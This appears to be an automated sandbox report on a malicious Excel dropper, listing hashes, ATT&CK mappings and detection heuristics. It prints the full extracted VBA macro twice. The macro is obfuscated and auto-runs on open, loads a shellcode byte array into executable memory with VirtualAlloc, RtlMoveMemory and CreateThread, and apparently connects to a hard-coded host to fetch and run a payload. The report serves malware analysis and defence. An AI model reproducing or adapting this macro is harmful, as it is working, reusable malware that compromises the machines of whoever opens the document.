Xls.Dropper.Agent-7119504-0 Office (OLE) malware analysis — malicious · 76f98d791f274b49

MALICIOUS

Office (OLE)

35.5 KB Created: 2018-06-12 18:45:11 Authoring application: Microsoft Excel First seen: 2019-03-18

MD5: fd8f5c60c61dee1b9a0108d2b711bd10 SHA-1: 341ecda77cbc95ddd42e0d3916a7215e901cddae SHA-256: 76f98d791f274b4947d8d60f4a3920b8c82169e1e849984890a93aa059fc888b

124 Risk Score

Malware Insights

Xls.Dropper.Agent-7119504-0 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file is identified as malicious by ClamAV with the signature Xls.Dropper.Agent-7119504-0. It contains VBA macros, including AutoOpen and Workbook_Open, which are commonly used to execute malicious code upon opening the document. The script utilizes VirtualAlloc and CreateThread API calls, indicating it likely allocates memory and creates a thread to execute shellcode, which is typical behavior for a dropper malware.

Heuristics 6

ClamAV: Xls.Dropper.Agent-7119504-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-7119504-0
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Sub
Sub AutoOpen()
Auto_Open
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
End Sub
Sub Workbook_Open()
Auto_Open
```

Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro

Matched line in script

#End If
Sub Auto_Open()
Dim lfoveadzop As Long, syobpebpitrlzpvfe As Variant, jzprwfvbukhau As Long

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4953 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4953 bytes
SHA-256: `fa07f87026f2c2ffa738778795ed950deb6fcb7457f036b8d8b2a2cc64588766`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "EstaPasta_de_trabalho" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Plan1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Módulo1" Const test1 = 2 Const test2 = 1 Const test3 = 0 #If VBA7 Then Private Declare PtrSafe Function tzlmokwh Lib "kernel32" Alias "CreateThread" (ByVal pqnfrydcbbfkbu As Long, ByVal jueugoufjbg As Long, ByVal tnrfkknfmityn As LongPtr, wytcygrg As Long, ByVal zyamqhlb As Long, wqqalghx As Long) As LongPtr Private Declare PtrSafe Function lkrhokgstxqrvrdnfu Lib "kernel32" Alias "VirtualAlloc" (ByVal chztlpdpehzdyyzmhtmw As Long, ByVal ltydhyusbauhajk As Long, ByVal yslnqpffieqttgfh As Long, ByVal xzlvastclfgccl As Long) As LongPtr Private Declare PtrSafe Function nqjstddnbfhaobeqkh Lib "kernel32" Alias "RtlMoveMemory" (ByVal hqsnqoxhdbjiihvyb As LongPtr, ByRef lxqnatdeubepcdjm As Any, ByVal qtmatsrj As Long) As LongPtr #Else Private Declare Function tzlmokwh Lib "kernel32" Alias "CreateThread" (ByVal pqnfrydcbbfkbu As Long, ByVal jueugoufjbg As Long, ByVal tnrfkknfmityn As Long, wytcygrg As Long, ByVal zyamqhlb As Long, wqqalghx As Long) As Long Private Declare Function lkrhokgstxqrvrdnfu Lib "kernel32" Alias "VirtualAlloc" (ByVal chztlpdpehzdyyzmhtmw As Long, ByVal ltydhyusbauhajk As Long, ByVal yslnqpffieqttgfh As Long, ByVal xzlvastclfgccl As Long) As Long Private Declare Function nqjstddnbfhaobeqkh Lib "kernel32" Alias "RtlMoveMemory" (ByVal hqsnqoxhdbjiihvyb As Long, ByRef lxqnatdeubepcdjm As Any, ByVal qtmatsrj As Long) As Long #End If Sub Auto_Open() Dim lfoveadzop As Long, syobpebpitrlzpvfe As Variant, jzprwfvbukhau As Long #If VBA7 Then Dim bnitoxsvwvcs As LongPtr, lrjgvnrkijvhxe As LongPtr #Else Dim bnitoxsvwvcs As Long, lrjgvnrkijvhxe As Long #End If syobpebpitrlzpvfe = Array(232, 130, test3, 0, test3, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 172, 60, 97, 124, test1, 44, 32, 193, 207, 13, test2, 199, 226, 242, 82, 87, 139, 82, 16, 139, 74, 60, 139, 76, 17, 120, 227, 72, test2, 209, 81, 139, 89, 32, test2, 211, 139, 73, 24, 227, 58, 73, 139, 52, 139, test2, 214, 49, 255, 172, 193, _ 207, 13, test2, 199, 56, 224, 117, 246, 3, 125, 248, 59, 125, 36, 117, 228, 88, 139, 88, 36, test2, 211, 102, 139, 12, 75, 139, 88, 28, test2, 211, 139, 4, 139, test2, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 95, 95, 90, 139, 18, 235, 141, 93, 104, 110, 101, 116, test3, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, 255, 213, 49, 219, 83, 83, 83, 83, _ 83, 104, 58, 86, 121, 167, 255, 213, 83, 83, 106, 3, 83, 83, 104, 185, test2, test3, 0, 232, 199, test3, 0, test3, 47, 101, 112, 90, 116, 54, 75, 112, 78, 72, 86, 107, 69, 56, 81, 88, 119, 88, 57, 69, 88, 115, 65, 119, 54, 78, 84, 72, 116, 105, 72, 66, 51, 90, 77, 78, 108, 68, 106, 50, 97, 117, 65, 121, 52, 66, 106, 105, 119, 69, 88, 104, 115, 105, 79, test3, _ 80, 104, 87, 137, 159, 198, 255, 213, 137, 198, 83, 104, test3, 50, 224, 132, 83, 83, 83, 87, 83, 86, 104, 235, 85, 46, 59, 255, 213, 150, 106, 10, 95, 104, 128, 51, test3, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 83, 83, 83, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 117, 20, 104, 136, 19, test3, 0, 104, 68, 240, 53, 224, 255, _ 213, 79, 117, 205, 232, 75, test3, 0, test3, 106, 64, 104, test3, 16, test3, 0, 104, test3, 0, 64, test3, 83, 104, 88, 164, 83, 229, 255, 213, 147, 83, 83, 137, 231, 87, 104, test3, 32, test3, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 207, 139, 7, test2, 195, 133, 192, 117, 229, 88, 195, 95, 232, 107, 255, 255, 255, 49, 57, 50, 46, 49, 54, 56, 46, 49, 48, 48, _ 46, 52, 56, test3, 187, 240, 181, 162, 86, 106, test3, 83, 255, 213) bnitoxsvwvcs = lkrhokgstxqrvrdnfu(test3, UBound(syobpebpitrlzpvfe), &H1000, &H40) For jzprwfvbukhau = LBound(syobpebpitrlzpvfe) To UBound(syobpebpitrlzpvfe) lfoveadzop = syobpebpitrlzpvfe(jzprwfvbukhau) lrjgvnrkijvhxe = nqjstddnbfhaobeqkh(bnitoxsvwvcs + jzprwfvbukhau, lfoveadzop, test2) Next jzprwfvbukhau lrjgvnrkijvhxe = tzlmokwh(test3, test3, bnitoxsvwvcs, test3, 0, test3) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub Private Function dskaymqvwmki(ByVal kwiqswaezhbd As String) As String Dim bapzlpgynsok As Long For bapzlpgynsok = 1 To Len(kwiqswaezhbd) Step 2 dskaymqvwmki = dskaymqvwmki & Chr$(Val("&H" & Mid$(kwiqswaezhbd, bapzlpgynsok, 2))) Next bapzlpgynsok End Function

SHA-256: fa07f87026f2c2ffa738778795ed950deb6fcb7457f036b8d8b2a2cc64588766

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "EstaPasta_de_trabalho"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Plan1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Attribute VB_Name = "Módulo1"
Const test1 = 2
Const test2 = 1
Const test3 = 0
#If VBA7 Then
Private Declare PtrSafe Function tzlmokwh Lib "kernel32" Alias "CreateThread" (ByVal pqnfrydcbbfkbu As Long, ByVal jueugoufjbg As Long, ByVal tnrfkknfmityn As LongPtr, wytcygrg As Long, ByVal zyamqhlb As Long, wqqalghx As Long) As LongPtr
Private Declare PtrSafe Function lkrhokgstxqrvrdnfu Lib "kernel32" Alias "VirtualAlloc" (ByVal chztlpdpehzdyyzmhtmw As Long, ByVal ltydhyusbauhajk As Long, ByVal yslnqpffieqttgfh As Long, ByVal xzlvastclfgccl As Long) As LongPtr
Private Declare PtrSafe Function nqjstddnbfhaobeqkh Lib "kernel32" Alias "RtlMoveMemory" (ByVal hqsnqoxhdbjiihvyb As LongPtr, ByRef lxqnatdeubepcdjm As Any, ByVal qtmatsrj As Long) As LongPtr
#Else
Private Declare Function tzlmokwh Lib "kernel32" Alias "CreateThread" (ByVal pqnfrydcbbfkbu As Long, ByVal jueugoufjbg As Long, ByVal tnrfkknfmityn As Long, wytcygrg As Long, ByVal zyamqhlb As Long, wqqalghx As Long) As Long
Private Declare Function lkrhokgstxqrvrdnfu Lib "kernel32" Alias "VirtualAlloc" (ByVal chztlpdpehzdyyzmhtmw As Long, ByVal ltydhyusbauhajk As Long, ByVal yslnqpffieqttgfh As Long, ByVal xzlvastclfgccl As Long) As Long
Private Declare Function nqjstddnbfhaobeqkh Lib "kernel32" Alias "RtlMoveMemory" (ByVal hqsnqoxhdbjiihvyb As Long, ByRef lxqnatdeubepcdjm As Any, ByVal qtmatsrj As Long) As Long
#End If
Sub Auto_Open()
Dim lfoveadzop As Long, syobpebpitrlzpvfe As Variant, jzprwfvbukhau As Long
#If VBA7 Then
Dim bnitoxsvwvcs As LongPtr, lrjgvnrkijvhxe As LongPtr
#Else
Dim bnitoxsvwvcs As Long, lrjgvnrkijvhxe As Long
#End If
syobpebpitrlzpvfe = Array(232, 130, test3, 0, test3, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 172, 60, 97, 124, test1, 44, 32, 193, 207, 13, test2, 199, 226, 242, 82, 87, 139, 82, 16, 139, 74, 60, 139, 76, 17, 120, 227, 72, test2, 209, 81, 139, 89, 32, test2, 211, 139, 73, 24, 227, 58, 73, 139, 52, 139, test2, 214, 49, 255, 172, 193, _
207, 13, test2, 199, 56, 224, 117, 246, 3, 125, 248, 59, 125, 36, 117, 228, 88, 139, 88, 36, test2, 211, 102, 139, 12, 75, 139, 88, 28, test2, 211, 139, 4, 139, test2, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 95, 95, 90, 139, 18, 235, 141, 93, 104, 110, 101, 116, test3, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, 255, 213, 49, 219, 83, 83, 83, 83, _
83, 104, 58, 86, 121, 167, 255, 213, 83, 83, 106, 3, 83, 83, 104, 185, test2, test3, 0, 232, 199, test3, 0, test3, 47, 101, 112, 90, 116, 54, 75, 112, 78, 72, 86, 107, 69, 56, 81, 88, 119, 88, 57, 69, 88, 115, 65, 119, 54, 78, 84, 72, 116, 105, 72, 66, 51, 90, 77, 78, 108, 68, 106, 50, 97, 117, 65, 121, 52, 66, 106, 105, 119, 69, 88, 104, 115, 105, 79, test3, _
80, 104, 87, 137, 159, 198, 255, 213, 137, 198, 83, 104, test3, 50, 224, 132, 83, 83, 83, 87, 83, 86, 104, 235, 85, 46, 59, 255, 213, 150, 106, 10, 95, 104, 128, 51, test3, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 83, 83, 83, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 117, 20, 104, 136, 19, test3, 0, 104, 68, 240, 53, 224, 255, _
213, 79, 117, 205, 232, 75, test3, 0, test3, 106, 64, 104, test3, 16, test3, 0, 104, test3, 0, 64, test3, 83, 104, 88, 164, 83, 229, 255, 213, 147, 83, 83, 137, 231, 87, 104, test3, 32, test3, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 207, 139, 7, test2, 195, 133, 192, 117, 229, 88, 195, 95, 232, 107, 255, 255, 255, 49, 57, 50, 46, 49, 54, 56, 46, 49, 48, 48, _
46, 52, 56, test3, 187, 240, 181, 162, 86, 106, test3, 83, 255, 213)
bnitoxsvwvcs = lkrhokgstxqrvrdnfu(test3, UBound(syobpebpitrlzpvfe), &H1000, &H40)
For jzprwfvbukhau = LBound(syobpebpitrlzpvfe) To UBound(syobpebpitrlzpvfe)
lfoveadzop = syobpebpitrlzpvfe(jzprwfvbukhau)
lrjgvnrkijvhxe = nqjstddnbfhaobeqkh(bnitoxsvwvcs + jzprwfvbukhau, lfoveadzop, test2)
Next jzprwfvbukhau
lrjgvnrkijvhxe = tzlmokwh(test3, test3, bnitoxsvwvcs, test3, 0, test3)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Private Function dskaymqvwmki(ByVal kwiqswaezhbd As String) As String
Dim bapzlpgynsok As Long
For bapzlpgynsok = 1 To Len(kwiqswaezhbd) Step 2
dskaymqvwmki = dskaymqvwmki & Chr$(Val("&H" & Mid$(kwiqswaezhbd, bapzlpgynsok, 2)))
Next bapzlpgynsok
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.